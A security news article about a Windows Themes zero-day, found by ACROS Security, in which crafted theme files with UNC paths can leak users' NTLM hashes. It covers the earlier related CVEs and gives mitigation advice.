Persistent Windows Vulnerability Could Leak User Credentials: Zero-Day Exploit Allows NTLM Hash Theft

October 29, 2024

The vulnerability in all versions of Windows, from Windows 7 to Windows 11, could allow attackers to steal NTLM authentication hashes from users. This zero-day flaw was reported to Microsoft by researchers at ACROS Security, who discovered it while creating a patch for an older Windows system related to CVE-2024-38030, a medium-severity Windows Themes spoofing vulnerability that Microsoft had mitigated in a previous security update. The newly discovered vulnerability is similar to CVE-2024-38030 and enables an authentication coercion attack, where a compromised device is tricked into sending NTLM hashes, a cryptographic representation of a user's password, to an attacker's system.

The flaw that ACROS discovered is separate but related to two flaws previously reported by Akamai researcher Tomer Peled. Windows themes files allow users to alter the look of their Windows desktop interface using wallpapers, screen savers, colors, and sounds. The vulnerabilities discovered by Peled were related to how these themes handled file paths to image resources, specifically 'BrandImage' or 'Wallpaper'. Due to improper validation, an attacker could alter the legitimate path to these resources to make Windows automatically send an authenticated request, along with the user's NTLM hash, to the attacker's device.

The original vulnerability (CVE-2024-21320) stemmed from the fact that key,value pairs accepted UNC paths, a standardized format for identifying network resources like shared files and folders, for network drives. This meant that a weaponized theme file, with a UNC path, could trigger an outbound connection with user authentication, without the user being aware. Microsoft addressed the issue by adding a check on the file path to ensure it wasn't a UNC path. However, the function Microsoft used for this validation allowed for some bypasses, leading to the discovery of the second vulnerability (CVE-2024-38030).

ACROS Security reported a third Windows themes spoofing vulnerability this week, rooted in the same file path issue. The newly discovered vulnerability also does not require the attacker to have any special privileges. However, the attacker must get the user to copy a theme file to another folder on their computer, then open that folder with Windows Explorer using a view that renders icons. The file could also be automatically downloaded to their Downloads folder while visiting the attacker's website, in which case the attacker would have to wait for the user to view the Downloads folder at a later time. Organizations are advised to disable NTLM where possible, but doing so could cause functional issues if any network components rely on it. The vulnerability could only successfully target a computer where NTLM is enabled. An attacker would also need to ensure that a request initiated by a malicious theme file could reach the attacker's server on the Internet or in an adjacent network, something that firewalls should typically block.

Related News

• Unofficial Patches Released for New Windows Themes Zero-Day Exploit

Latest News

• Google Addresses Critical Vulnerability in Chrome Browser
• Unofficial Patches Released for New Windows Themes Zero-Day Exploit
• Multiple Security Flaws Uncovered in Open-Source AI and ML Models
• ChatGPT Vulnerable to Hex Code Manipulation: Mozilla Report
• Fog and Akira Ransomware Operations Exploit SonicWall VPNs for Network Infiltration